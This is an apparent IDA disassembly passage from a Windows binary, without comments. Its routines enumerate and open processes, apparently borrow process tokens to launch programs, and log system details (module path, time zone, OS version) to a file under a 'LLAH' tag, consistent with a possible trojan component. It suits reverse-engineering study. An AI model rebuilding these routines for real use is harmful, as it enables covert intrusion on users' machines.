; sub_41C198+15D�j
mov eax, [ebp+var_4]
shr eax, 1
dec eax
push eax
mov [ebp+var_4], eax
lea eax, [ebp+var_27C]
push eax
call sub_41BC1D
pop ecx
pop ecx
push [ebp+var_4]
mov esi, eax
push esi
call dword_40FAD0
xor ecx, ecx
cmp [ebp+var_4], ebx
jbe short loc_41C366
loc_41C349: ; CODE XREF: sub_41C198+1CC�j
mov al, [ecx+esi]
cmp al, 61h
jl short loc_41C354
cmp al, 7Ah
jle short loc_41C360
loc_41C354: ; CODE XREF: sub_41C198+1B6�j
cmp al, 30h
jl short loc_41C35C
cmp al, 39h
jle short loc_41C360
loc_41C35C: ; CODE XREF: sub_41C198+1BE�j
mov byte ptr [ecx+esi], 5Fh
loc_41C360: ; CODE XREF: sub_41C198+1BA�j
; sub_41C198+1C2�j
inc ecx
cmp ecx, [ebp+var_4]
jb short loc_41C349
loc_41C366: ; CODE XREF: sub_41C198+1AF�j
push [ebp+var_4]
mov dword_40FD20, esi
push esi
call sub_41BC6D
mov [ebp+arg_0], eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_41BD39
mov eax, [ebp+arg_0]
add esp, 10h
pop edi
pop esi
mov dword_40FB2C, eax
pop ebx
leave
retn
sub_41C198 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C395 proc near ; CODE XREF: .data:00416ABF�p
var_C58 = byte ptr -0C58h
var_A50 = byte ptr -0A50h
var_848 = byte ptr -848h
var_640 = word ptr -640h
var_438 = dword ptr -438h
var_430 = dword ptr -430h
var_414 = byte ptr -414h
var_20C = word ptr -20Ch
var_20A = word ptr -20Ah
var_208 = word ptr -208h
var_206 = word ptr -206h
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0C58h
push ebx
push edi
xor edi, edi
push edi
push 2
call dword_40FE14 ; CreateToolhelp32Snapshot
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_41C3B9
xor eax, eax
jmp loc_41C552
; ---------------------------------------------------------------------------
loc_41C3B9: ; CODE XREF: sub_41C395+1B�j
test byte ptr dword_40FC20, 1
mov [ebp+var_4], 103h
jz short loc_41C3E7
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_640]
push eax
call dword_40FBC4
test eax, eax
jnz short loc_41C3FC
mov [ebp+var_640], di
jmp short loc_41C3FC
; ---------------------------------------------------------------------------
loc_41C3E7: ; CODE XREF: sub_41C395+32�j
mov eax, dword_40FB34
push dword ptr [eax+20h]
lea eax, [ebp+var_640]
push eax
call dword_40FD98 ; lstrcpyW
loc_41C3FC: ; CODE XREF: sub_41C395+47�j
; sub_41C395+50�j
mov eax, dword_40FC20
not eax
push esi
and eax, 1
push 1
or eax, 24h
push eax
lea eax, [ebp+var_C58]
push eax
push edi
mov [ebp+var_4], edi
call dword_40FBA8
lea eax, [ebp+var_438]
push eax
push ebx
mov [ebp+var_438], 22Ch
call dword_40FE18 ; Process32FirstW
jmp loc_41C53F
; ---------------------------------------------------------------------------
loc_41C43B: ; CODE XREF: sub_41C395+1AC�j
push [ebp+arg_0]
lea eax, [ebp+var_414]
push eax
call dword_40FD88 ; lstrcmpiW
test eax, eax
jnz loc_41C531
push [ebp+var_430]
push edi
push 1F0FFFh
call dword_40FE34 ; OpenProcess
mov esi, eax
cmp esi, edi
jz loc_41C531
push 104h
lea eax, [ebp+var_20C]
push eax
push edi
push esi
call dword_40FCAC
test eax, eax
jz loc_41C52A
push [ebp+arg_0]
lea eax, [ebp+var_C58]
push eax
lea eax, [ebp+var_848]
push eax
call dword_40FC8C
cmp [ebp+var_20C], 5Ch
jnz short loc_41C4D9
cmp [ebp+var_20A], 3Fh
jnz short loc_41C4D9
cmp [ebp+var_208], 3Fh
jnz short loc_41C4D9
cmp [ebp+var_206], 5Ch
jnz short loc_41C4D9
lea eax, [ebp+var_848]
push eax
lea eax, [ebp+var_204]
jmp short loc_41C4E6
; ---------------------------------------------------------------------------
loc_41C4D9: ; CODE XREF: sub_41C395+115�j
; sub_41C395+11F�j ...
lea eax, [ebp+var_848]
push eax
lea eax, [ebp+var_20C]
loc_41C4E6: ; CODE XREF: sub_41C395+142�j
push eax
call dword_40FD88 ; lstrcmpiW
cmp eax, edi
jnz short loc_41C52A
cmp [ebp+var_4], edi
jnz short loc_41C4FF
mov eax, [ebp+var_430]
mov [ebp+var_4], eax
loc_41C4FF: ; CODE XREF: sub_41C395+15F�j
lea eax, [ebp+var_A50]
push eax
push esi
call sub_41B65D
test al, al
pop ecx
pop ecx
jz short loc_41C52A
lea eax, [ebp+var_640]
push eax
lea eax, [ebp+var_A50]
push eax
call dword_40FD88 ; lstrcmpiW
test eax, eax
jz short loc_41C556
loc_41C52A: ; CODE XREF: sub_41C395+F0�j
; sub_41C395+15A�j ...
push esi
call dword_40FDAC ; CloseHandle
loc_41C531: ; CODE XREF: sub_41C395+B8�j
; sub_41C395+D4�j
lea eax, [ebp+var_438]
push eax
push ebx
call dword_40FE1C ; Process32NextW
loc_41C53F: ; CODE XREF: sub_41C395+A1�j
test eax, eax
jnz loc_41C43B
push ebx
call dword_40FDAC ; CloseHandle
mov eax, [ebp+var_4]
loc_41C551: ; CODE XREF: sub_41C395+1D5�j
pop esi
loc_41C552: ; CODE XREF: sub_41C395+1F�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41C556: ; CODE XREF: sub_41C395+193�j
push esi
call dword_40FDAC ; CloseHandle
push ebx
call dword_40FDAC ; CloseHandle
mov eax, [ebp+var_430]
jmp short loc_41C551
sub_41C395 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C56C proc near ; CODE XREF: sub_414C49+1B1�p
; .data:004187B0�p
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_30 = dword ptr -30h
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
xor ebx, ebx
cmp byte ptr [ebp+arg_0], bl
push esi
mov [ebp+var_5C], 44h
mov [ebp+var_30], ebx
mov [ebp+var_54], ebx
mov [ebp+var_50], ebx
mov [ebp+var_2A], bx
mov [ebp+var_28], ebx
mov [ebp+var_58], ebx
jz loc_41C63D
call sub_41B588
test al, al
jz loc_41C63D
lea eax, [ebp+var_4]
push eax
mov [ebp+arg_0], ebx
mov [ebp+var_4], ebx
call dword_40FB00
push eax
call dword_40FAFC
push [ebp+var_4]
push ebx
push 400h
call dword_40FE34 ; OpenProcess
mov esi, eax
cmp esi, ebx
jz short loc_41C60E
lea eax, [ebp+var_8]
push eax
push 0Bh
push esi
call dword_40FBD0
test eax, eax
jz short loc_41C607
lea eax, [ebp+arg_0]
push eax
push 1
push 2
push ebx
push 0Bh
push [ebp+var_8]
call dword_40FC00
test eax, eax
jnz short loc_41C5FE
mov [ebp+arg_0], ebx
loc_41C5FE: ; CODE XREF: sub_41C56C+8D�j
push [ebp+var_8]
call dword_40FDAC ; CloseHandle
loc_41C607: ; CODE XREF: sub_41C56C+75�j
push esi
call dword_40FDAC ; CloseHandle
loc_41C60E: ; CODE XREF: sub_41C56C+64�j
cmp [ebp+arg_0], ebx
jz short loc_41C674
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_5C]
push eax
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40FBFC
push [ebp+arg_0]
mov esi, eax
call dword_40FDAC ; CloseHandle
jmp short loc_41C659
; ---------------------------------------------------------------------------
loc_41C63D: ; CODE XREF: sub_41C56C+27�j
; sub_41C56C+34�j
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_5C]
push eax
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
call dword_40FE58 ; CreateProcessW
mov esi, eax
loc_41C659: ; CODE XREF: sub_41C56C+CF�j
cmp esi, ebx
jz short loc_41C674
push [ebp+var_18]
call dword_40FDAC ; CloseHandle
push [ebp+var_14]
call dword_40FDAC ; CloseHandle
mov eax, [ebp+var_10]
jmp short loc_41C676
; ---------------------------------------------------------------------------
loc_41C674: ; CODE XREF: sub_41C56C+A5�j
; sub_41C56C+EF�j
xor eax, eax
loc_41C676: ; CODE XREF: sub_41C56C+106�j
pop esi
pop ebx
leave
retn
sub_41C56C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C67A proc near ; CODE XREF: sub_41E0EA+137�p
; sub_41F7AC+98�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_41B99C
xor ebx, ebx
cmp [ebp+var_4], ebx
pop ecx
pop ecx
mov esi, eax
jz short loc_41C6C0
push [ebp+arg_8]
push [ebp+arg_4]
call dword_40FD94 ; lstrlenA
push eax
push [ebp+arg_4]
mov eax, [ebp+var_4]
push esi
call sub_41B911
push [ebp+var_4]
test eax, eax
setnz bl
call sub_41A83D
add esp, 14h
loc_41C6C0: ; CODE XREF: sub_41C67A+1B�j
pop esi
mov al, bl
pop ebx
leave
retn
sub_41C67A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
lea eax, [ebp-8]
push eax
push dword ptr [ebp+8]
call sub_41B99C
cmp dword ptr [ebp-8], 0
pop ecx
pop ecx
mov ebx, eax
mov byte ptr [ebp-1], 0
jz short loc_41C751
push edi
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
call dword_40FD94 ; lstrlenA
push eax
push dword ptr [ebp+0Ch]
mov eax, [ebp-8]
push ebx
call sub_41B911
mov edi, eax
add esp, 10h
test edi, edi
jz short loc_41C747
push esi
push edi
call dword_40FD94 ; lstrlenA
mov esi, eax
mov eax, [ebp-8]
inc esi
sub eax, esi
sub eax, edi
add eax, ebx
push eax
lea eax, [esi+edi]
push eax
push edi
call sub_41A857
sub ebx, esi
add esp, 0Ch
cmp ebx, 1
pop esi
jnz short loc_41C735
xor ebx, ebx
loc_41C735: ; CODE XREF: .data:0041C731�j
push ebx
push dword ptr [ebp-8]
push dword ptr [ebp+8]
call sub_41B9E9
add esp, 0Ch
mov [ebp-1], al
loc_41C747: ; CODE XREF: .data:0041C707�j
push dword ptr [ebp-8]
call sub_41A83D
pop ecx
pop edi
loc_41C751: ; CODE XREF: .data:0041C6E4�j
mov al, [ebp-1]
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C757 proc near ; CODE XREF: sub_41549E+21�p
; sub_41555A+1B�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
sub esp, 0Ch
cmp eax, [ebp+arg_4]
jb short loc_41C769
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_41C769: ; CODE XREF: sub_41C757+C�j
and [ebp+var_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
and dword ptr [edi], 0
mov [ebp+var_C], eax
loc_41C779: ; CODE XREF: sub_41C757+96�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_10]
jnb short loc_41C7EF
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41A5B6
add esp, 10h
test al, al
jz short loc_41C7EF
mov esi, [ebp+var_C]
mov eax, esi
sub eax, [ebp+var_8]
inc eax
push eax
push [ebp+var_8]
call sub_41BC6D
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
mov [ebp+var_8], ebx
jz short loc_41C7EF
mov eax, [ebp+var_4]
lea eax, ds:4[eax*4]
push eax
push dword ptr [edi]
call sub_41BE45
test eax, eax
pop ecx
pop ecx
mov [edi], eax
jz short loc_41C7EF
mov ecx, [ebp+var_4]
inc [ebp+var_4]
mov [eax+ecx*4], ebx
xor eax, eax
cmp byte ptr [esi+1], 22h
setz al
inc eax
add eax, esi
cmp eax, [ebp+arg_4]
mov [ebp+arg_0], eax
jb short loc_41C779
loc_41C7EF: ; CODE XREF: sub_41C757+28�j
; sub_41C757+42�j ...
mov eax, [ebp+arg_C]
test eax, eax
pop edi
pop esi
pop ebx
jz short loc_41C805
mov ecx, [ebp+arg_0]
cmp ecx, [ebp+arg_4]
sbb edx, edx
and edx, ecx
mov [eax], edx
loc_41C805: ; CODE XREF: sub_41C757+A0�j
mov eax, [ebp+var_4]
leave
retn
sub_41C757 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C80A proc near ; CODE XREF: sub_415FD3+D9�p
; sub_415FD3+10E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
jz short loc_41C85B
cmp [ebp+arg_4], ebx
jz short loc_41C85B
push edi
push [ebp+arg_4]
call dword_40FD94 ; lstrlenA
mov edi, eax
mov eax, [esi]
inc edi
cmp eax, ebx
jz short loc_41C839
push eax
call dword_40FD94 ; lstrlenA
mov ebx, eax
loc_41C839: ; CODE XREF: sub_41C80A+24�j
lea eax, [ebx+edi]
push eax
push dword ptr [esi]
call sub_41BE45
test eax, eax
pop ecx
pop ecx
pop edi
jnz short loc_41C861
cmp [ebp+arg_8], al
jz short loc_41C85B
push dword ptr [esi]
call sub_41A83D
and dword ptr [esi], 0
pop ecx
loc_41C85B: ; CODE XREF: sub_41C80A+C�j
; sub_41C80A+11�j ...
xor al, al
loc_41C85D: ; CODE XREF: sub_41C80A+67�j
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41C861: ; CODE XREF: sub_41C80A+3F�j
push [ebp+arg_4]
mov [esi], eax
add eax, ebx
push eax
call dword_40FDA0 ; lstrcpyA
mov al, 1
jmp short loc_41C85D
sub_41C80A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C873 proc near ; CODE XREF: sub_415FD3+36�p
; sub_41735E+9F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_0]
add eax, edi
xor ebx, ebx
mov [ebp+arg_4], eax
mov [esi], ebx
cmp edi, eax
jmp short loc_41C8CD
; ---------------------------------------------------------------------------
loc_41C88F: ; CODE XREF: sub_41C873:loc_41C8D0�j
mov al, [edi]
inc edi
cmp al, 0Ah
jz short loc_41C89B
cmp edi, [ebp+arg_4]
jnz short loc_41C8D0
loc_41C89B: ; CODE XREF: sub_41C873+21�j
mov eax, [esi]
lea eax, ds:4[eax*4]
push eax
push ebx
call sub_41BE45
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz short loc_41C8D9
mov eax, edi
sub eax, [ebp+arg_0]
push eax
push [ebp+arg_0]
call sub_41BC6D
pop ecx
pop ecx
mov ecx, [esi]
mov [ebx+ecx*4], eax
inc dword ptr [esi]
cmp edi, [ebp+arg_4]
loc_41C8CD: ; CODE XREF: sub_41C873+1A�j
mov [ebp+arg_0], edi
loc_41C8D0: ; CODE XREF: sub_41C873+26�j
jb short loc_41C88F
mov eax, ebx
loc_41C8D4: ; CODE XREF: sub_41C873+75�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41C8D9: ; CODE XREF: sub_41C873+3E�j
push dword ptr [esi]
push ebx
call sub_41A8D2
and dword ptr [esi], 0
pop ecx
pop ecx
xor eax, eax
jmp short loc_41C8D4
sub_41C873 endp
; =============== S U B R O U T I N E =======================================
sub_41C8EA proc near ; CODE XREF: sub_41512C+5A�p
; sub_41549E+4E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
mov esi, [esp+8+arg_0]
push dword ptr [esi]
call sub_41BE45
test eax, eax
pop ecx
pop ecx
jnz short loc_41C904
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C904: ; CODE XREF: sub_41C8EA+14�j
mov [esi], eax
mov al, 1
pop esi
retn
sub_41C8EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C90A proc near ; CODE XREF: sub_41E26B+46�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_4]
cmp byte ptr [esi], 0
jnz short loc_41C91E
xor al, al
jmp loc_41C9C3
; ---------------------------------------------------------------------------
loc_41C91E: ; CODE XREF: sub_41C90A+B�j
push ebx
push edi
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_41B99C
pop ecx
pop ecx
push esi
mov ebx, eax
call dword_40FD94 ; lstrlenA
mov esi, [ebp+var_4]
test esi, esi
mov edi, eax
jz short loc_41C97C
push ebx
push esi
call sub_41A1D4
test al, al
pop ecx
pop ecx
jnz short loc_41C95B
push esi
call sub_41A83D
xor ebx, ebx
pop ecx
mov [ebp+var_4], ebx
jmp short loc_41C981
; ---------------------------------------------------------------------------
loc_41C95B: ; CODE XREF: sub_41C90A+41�j
push [ebp+arg_8]
mov eax, esi
push edi
push [ebp+arg_4]
push ebx
call sub_41B911
add esp, 10h
test eax, eax
jz short loc_41C97C
push esi
call sub_41A83D
pop ecx
mov al, 1
jmp short loc_41C9C1
; ---------------------------------------------------------------------------
loc_41C97C: ; CODE XREF: sub_41C90A+34�j
; sub_41C90A+65�j
test ebx, ebx
jz short loc_41C981
dec ebx
loc_41C981: ; CODE XREF: sub_41C90A+4F�j
; sub_41C90A+74�j
lea esi, [edi+ebx]
lea eax, [esi+2]
push eax
lea eax, [ebp+var_4]
push eax
call sub_41C8EA
test al, al
pop ecx
pop ecx
jz short loc_41C9BF
inc edi
push edi
mov edi, [ebp+var_4]
push [ebp+arg_4]
lea eax, [edi+ebx]
push eax
call sub_41A857
mov byte ptr [edi+esi+1], 0
add esi, 2
push esi
push edi
push [ebp+arg_0]
call sub_41B9E9
add esp, 18h
jmp short loc_41C9C1
; ---------------------------------------------------------------------------
loc_41C9BF: ; CODE XREF: sub_41C90A+8B�j
xor al, al
loc_41C9C1: ; CODE XREF: sub_41C90A+70�j
; sub_41C90A+B3�j
pop edi
pop ebx
loc_41C9C3: ; CODE XREF: sub_41C90A+F�j
pop esi
leave
retn
sub_41C90A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_41C9C6 proc near ; CODE XREF: .data:004157E6�p
; .data:00416B1B�p
var_2B4 = byte ptr -2B4h
var_AC = word ptr -0ACh
var_66 = word ptr -66h
var_58 = dword ptr -58h
var_12 = word ptr -12h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 2B4h
push esi
mov esi, offset dword_4100E0
push esi
call sub_41B1E0
mov eax, dword_40FB34
pop ecx
push dword ptr [eax+4]
push dword ptr [eax]
lea eax, [ebp+78h+var_2B4]
push eax
call dword_40FC8C
lea eax, [ebp+78h+var_2B4]
push eax
push esi
push esi
call dword_40FC8C
push 103h
push offset byte_40FEC0
push 0
mov byte_40FEC0, 0
call dword_40FD74 ; GetModuleFileNameA
mov byte_40FFC5, al
lea eax, [ebp+78h+var_AC]
push eax
call dword_40FD54 ; GetTimeZoneInformation
mov ax, [ebp+78h+var_12]
mov cx, [ebp+78h+var_66]
neg ax
push offset dword_40FFC8
mov dword_40FFC8, 114h
sbb eax, eax
and eax, [ebp+78h+var_4]
neg cx
sbb ecx, ecx
and ecx, [ebp+78h+var_58]
and word_40FFDC, 0
add ax, cx
add ax, [ebp+78h+var_AC]
mov word_4100DC, ax
call dword_40FD58 ; GetVersionExW
push offset word_40FFDC
call dword_40FD90 ; lstrlenW
cmp eax, 0Eh
jl short loc_41CA9A
mov eax, dword_40FFF6
add eax, 0FFFFFFCFh
cmp ax, 8
ja short loc_41CA9A
mov al, byte ptr dword_40FFF6
sub al, 30h
mov byte_40FFC4, al
jmp short loc_41CAA1
; ---------------------------------------------------------------------------
loc_41CA9A: ; CODE XREF: sub_41C9C6+B6�j
; sub_41C9C6+C4�j
mov byte_40FFC4, 0
loc_41CAA1: ; CODE XREF: sub_41C9C6+D2�j
mov eax, esi
pop esi
add ebp, 78h
leave
retn
sub_41C9C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CAA9 proc near ; CODE XREF: sub_416293+38E�p
; .data:0041DA17�p ...
var_30 = byte ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 30h
cmp [ebp+arg_8], 0A00000h
jnb locret_41CD74
push ebx
push esi
push edi
call dword_40FE50 ; GetCurrentThread
mov ebx, eax
push ebx
mov [ebp+var_C], ebx
call dword_40FE4C ; GetThreadPriority
push 2
push ebx
mov [ebp+var_8], eax
call dword_40FE48 ; SetThreadPriority
movzx eax, byte_40FFC5
mov ecx, [ebp+arg_8]
lea eax, [eax+ecx+2Dh]
push eax
call sub_41A81F
mov esi, eax
xor edi, edi
cmp esi, edi
pop ecx
jnz short loc_41CB03
push [ebp+var_8]
push ebx
jmp loc_41CC82
; ---------------------------------------------------------------------------
loc_41CB03: ; CODE XREF: sub_41CAA9+4F�j
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_4]
movzx eax, byte_40FFC5
push [ebp+arg_8]
lea eax, [eax+esi+2Ch]
push eax
call dword_40FC80
movzx eax, byte_40FFC5
lea eax, [eax+esi+2Ch]
push eax
call dword_40FD94 ; lstrlenA
mov [ebp+arg_8], eax
call dword_40FDE8 ; GetTickCount
mov [ebp+var_18], eax
lea eax, [ebp+var_30]
push eax
mov [ebp+var_14], 2Ch
call dword_40FE8C ; GetSystemTime
push 4
pop ebx
push ebx
lea eax, [ebp+arg_0]
push eax
push esi
call sub_41A857
push 2
lea eax, [ebp+var_14]
push eax
lea eax, [esi+4]
push eax
call sub_41A857
push 1
lea eax, [esi+6]
push offset byte_40FFC5
push eax
call sub_41A857
mov eax, dword_40FC1C
add eax, 40h
push 2
push eax
lea eax, [esi+7]
push eax
call sub_41A857
push ebx
lea eax, [ebp+arg_8]
push eax
lea eax, [esi+9]
push eax
call sub_41A857
push 10h
lea eax, [ebp+var_30]
push eax
lea eax, [esi+0Dh]
push eax
call sub_41A857
add esp, 48h
push 2
lea eax, [esi+1Dh]
push offset word_4100DC
push eax
call sub_41A857
push 1
lea eax, [esi+1Fh]
push offset dword_40FFCC
push eax
call sub_41A857
push 1
lea eax, [esi+20h]
push offset dword_40FFD0
push eax
call sub_41A857
push ebx
lea eax, [esi+21h]
push offset dword_40FFD4
push eax
call sub_41A857
push 1
push offset byte_40FFC4
lea eax, [esi+25h]
push eax
call sub_41A857
push ebx
lea eax, [ebp+var_18]
push eax
lea eax, [esi+26h]
push eax
call sub_41A857
add esp, 48h
push 2
lea eax, [esi+2Ah]
push offset word_40FBAC
push eax
call sub_41A857
movzx eax, byte_40FFC5
push eax
lea eax, [esi+2Ch]
push offset byte_40FEC0
push eax
call sub_41A857
mov ecx, [ebp+arg_8]
lea eax, [ebp+var_10]
push eax
movzx eax, byte_40FFC5
lea eax, [eax+ecx+2Ch]
push eax
push esi
mov [ebp+var_10], esi
call sub_41AF34
push esi
mov [ebp+arg_8], eax
call sub_41A83D
add esp, 28h
cmp [ebp+arg_8], edi
jz short loc_41CC7C
call sub_41B390
mov eax, dword_40FB34
push dword ptr [eax+24h]
call sub_41B06E
cmp eax, edi
pop ecx
mov [ebp+var_20], eax
jnz short loc_41CC8D
loc_41CC7C: ; CODE XREF: sub_41CAA9+1B7�j
push [ebp+var_8]
push [ebp+var_C]
loc_41CC82: ; CODE XREF: sub_41CAA9+55�j
call dword_40FE48 ; SetThreadPriority
jmp loc_41CD71
; ---------------------------------------------------------------------------
loc_41CC8D: ; CODE XREF: sub_41CAA9+1D1�j
mov eax, dword_40FB34
push edi
push edi
push edi
push edi
push 8
push dword ptr [eax+30h]
call sub_41AAD0
add esp, 18h
push edi
push edi
push ebx
push edi
push edi
push 40000000h
push offset dword_4100E0
call dword_40FDC0 ; CreateFileW
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_41CD47
push 2
push edi
push edi
push esi
mov [ebp+var_1C], 48414C4Ch
call dword_40FDC8 ; SetFilePointer
push edi
lea eax, [ebp+var_4]
push eax
push ebx
lea eax, [ebp+var_1C]
push eax
push esi
call dword_40FDF0 ; WriteFile
test eax, eax
jz short loc_41CD39
cmp [ebp+var_4], ebx
jnz short loc_41CD39
push edi
lea eax, [ebp+var_4]
push eax
push ebx
lea eax, [ebp+arg_8]
push eax
push esi
call dword_40FDF0 ; WriteFile
test eax, eax
jnz short loc_41CD0B
push 1
push edi
push 0FFFFFFFCh
jmp short loc_41CD26
; ---------------------------------------------------------------------------
loc_41CD0B: ; CODE XREF: sub_41CAA9+259�j
push edi
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+var_10]
push esi
call dword_40FDF0 ; WriteFile
test eax, eax
jnz short loc_41CD39
push 1
push edi
push 0FFFFFFF8h
loc_41CD26: ; CODE XREF: sub_41CAA9+260�j
pop eax
sub eax, [ebp+var_4]
push eax
push esi
call dword_40FDC8 ; SetFilePointer
push esi
call dword_40FDF8 ; SetEndOfFile
loc_41CD39: ; CODE XREF: sub_41CAA9+23F�j
; sub_41CAA9+244�j ...
push esi
call dword_40FE00 ; FlushFileBuffers
push esi
call dword_40FDAC ; CloseHandle
loc_41CD47: ; CODE XREF: sub_41CAA9+214�j
push [ebp+var_8]
push [ebp+var_C]
call dword_40FE48 ; SetThreadPriority
mov eax, dword_40FB34
push edi
push edi
push edi
push edi
push 7
push dword ptr [eax+30h]
call sub_41AAD0
push [ebp+var_20]
call sub_41B0A5
add esp, 1Ch
loc_41CD71: ; CODE XREF: sub_41CAA9+1DF�j
pop edi
pop esi
pop ebx
locret_41CD74: ; CODE XREF: sub_41CAA9+D�j
leave
retn
sub_41CAA9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CD76 proc near ; CODE XREF: sub_414785+103�p
; sub_41CF3B+56�p ...
var_448 = byte ptr -448h
var_240 = byte ptr -240h
var_38 = byte ptr -38h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 448h
cmp [ebp+arg_8], 0A00000h
jbe short loc_41CD8C
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_41CD8C: ; CODE XREF: sub_41CD76+10�j
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
jnz short loc_41CD9B
mov al, 1
jmp loc_41CF38
; ---------------------------------------------------------------------------
loc_41CD9B: ; CODE XREF: sub_41CD76+1C�j
cmp [ebp+arg_0], ebx
jnz short loc_41CDA7
xor al, al
jmp loc_41CF38
; ---------------------------------------------------------------------------
loc_41CDA7: ; CODE XREF: sub_41CD76+28�j
push edi
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_41BC1D
mov edi, eax
cmp edi, ebx
pop ecx
pop ecx
jnz short loc_41CDC1
xor al, al
jmp loc_41CF37
; ---------------------------------------------------------------------------
loc_41CDC1: ; CODE XREF: sub_41CD76+42�j
call dword_40FDE8 ; GetTickCount
mov [ebp+var_8], eax
call sub_41B390
lea eax, [ebp+var_448]
push eax
call sub_41B1E0
mov eax, dword_40FB34
pop ecx
push dword ptr [eax]
lea eax, [ebp+var_448]
push eax
push eax
call dword_40FC8C
jmp short loc_41CDF6
; ---------------------------------------------------------------------------
loc_41CDF3: ; CODE XREF: sub_41CD76+C4�j
inc [ebp+var_8]
loc_41CDF6: ; CODE XREF: sub_41CD76+7B�j
push [ebp+var_8]
mov eax, dword_40FB34
push dword ptr [eax+18Ch]
lea eax, [ebp+var_38]
push 13h
push eax
call dword_40FC84
add esp, 10h
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_448]
push eax
lea eax, [ebp+var_240]
push eax
call dword_40FC8C
lea eax, [ebp+var_240]
push eax
call dword_40FC94
test eax, eax
jnz short loc_41CDF3
push esi
push ebx
push 2
push 2
push ebx
push ebx
push 40000000h
lea eax, [ebp+var_240]
push eax
mov [ebp+var_1], bl
call dword_40FDC0 ; CreateFileW
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_41CF33
lea eax, [ebp+var_C]
push eax
push edi
call dword_40FD94 ; lstrlenA
push eax
push edi
call sub_41AF34
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_41CF1A
push ebx
lea eax, [ebp+var_10]
